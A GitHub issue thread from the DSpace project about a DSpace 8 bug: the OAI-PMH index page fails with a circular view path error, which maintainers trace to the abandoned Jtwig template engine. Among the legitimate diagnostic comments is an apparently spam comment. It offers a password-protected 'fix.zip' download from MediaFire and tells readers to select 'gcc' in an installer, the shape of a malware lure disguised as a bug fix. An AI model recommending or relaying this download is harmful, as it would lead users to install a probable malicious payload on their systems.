### ISSUE TITLE
OAI-PMH index page throws 500 error (circular view path)

### ISSUE THREAD

**Issue by kshepherd** [DSpace/DSpace#9778]
## Links
Will be fixed by resolving #10009 (removal of JTwig to fix javax dependency problems) - check that issue for related pull requests and updates

## Describe the bug
Since DSpace 8.0, the OAI index page appears not to work properly, throwing a 500 error due to a circular view dependency. The spring error is logged as below:

```
2024-08-28 07:17:20,626 INFO  unknown 7955bf8c-74c0-4dbb-8a7f-6b88c608e755 org.dspace.app.rest.utils.DSpaceAPIRequestLoggingFilter @ Before request [GET /server/oai/] originated from unknown
2024-08-28 07:17:20,627 ERROR unknown unknown org.springframework.boot.web.servlet.support.ErrorPageFilter @ Forwarding to error page from request [/oai/] due to exception [Circular view path [index]: would dispatch back to the current handler URL [/server/oai/index] again. Check your ViewResolver setup! (Hint: This may be the result of an unspecified view, due to default view name generation.)]
jakarta.servlet.ServletException: Circular view path [index]: would dispatch back to the current handler URL [/server/oai/index] again. Check your ViewResolver setup! (Hint: This may be the result of an unspecified view, due to default view name generation.)
```

Actual full URLs like https://demo.dspace.org/server/oai/request?verb=Identify work fine, but https://demo.dspace.org/server/oai does not.

This occurs in all the instances I've tried so far, including the official demo site, but I haven't ruled out some configuration or change that I've missed. However, it seems to be a bug.

## To Reproduce
Visit the main /server/oai (or equivalent) path for any 8.x DSpace instance and check the resulting page, status code and any errors in DSpace logs.

## Expected behavior
The index page linking to all contexts, OAI navbar menu, etc., as per previous versions

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by tdonohue** [comment]
@kshepherd : Good catch.  It doesn't appear that this error impacts OAI-PMH harvesting in any way, but it does mean that you don't see the normal list of "Available Contexts" which was available in 7.6.x and below. 

Here's an example of what it should look like in 7.6.x from the DSpaceDirect demo site (currently running 7.6.1, it appears): 
https://demo.dspacedirect.org/server/oai/

Moving this to the maintenance board.  Needs a volunteer.

**Comment by kshepherd** [comment]
Digging a bit more into this, jtwig is really old (no updates for 6+ years), it was written by the original XOAI author, so I think one recommendation would be that we bring the spring boot usage here in line with what we use for the HAL browser, as well as making sure we haven't missed any necessary configuration changes (view paths, etc) introduced in the spring boot update.

**Comment by tdonohue** [comment]
@kshepherd : I agree it is likely about time to replace jtwig with something else.  However, I think that should be split out as a separate ticket, as it's a larger effort that would need to be done in a major release (9.0, 10.0, etc).  

This ticket should be about simply fixing the 500 error in 8.x, which shouldn't require such a large overhaul (at least I hope it doesn't).

**Comment by saschaszott** [comment]
The removal of Jtwig template engine is addressed in issue #10009

**Comment by saschaszott** [comment]
@kshepherd , jwtig-spring (https://github.com/jtwig/jtwig-spring) was build against Spring 5.0.5. DS8 comes with Spring 6 and runs as a standalone app. It could be that Jtwig (especially `JtwigView` or `JtwigViewResolver`) is not compatible with Spring 6. IMHO, the best solution to fix this issue is a replacement of Jtwig (this is relatively easy as it it used only in dspace-oai).

**Comment by saschaszott** [comment]
@kshepherd , @tdonohue I've found the root cause of the bug: class`JtwigView` has two "old" `javax.servlet.http` dependencies: https://github.com/jtwig/jtwig-spring/blob/master/src/main/java/org/jtwig/spring/JtwigView.java

This means we can no longer use Jtwig in DS8+ as this is the first DS version which relies on Jakarta EE 9.

We should close this ticket as we cannot fix this problem (Jtwig is abandoned). We should replace Jtwig asap (in #10009).

**Comment by kshepherd** [comment]
@saschaszott agreed, removal of jtwig seems the best way and there are no obvious easy 'workarounds'.
I would prefer to leave this ticket open for now, but linked to #10009 (as a symptom) as it is a discrete bug, and close it once #10009 is also resolved.
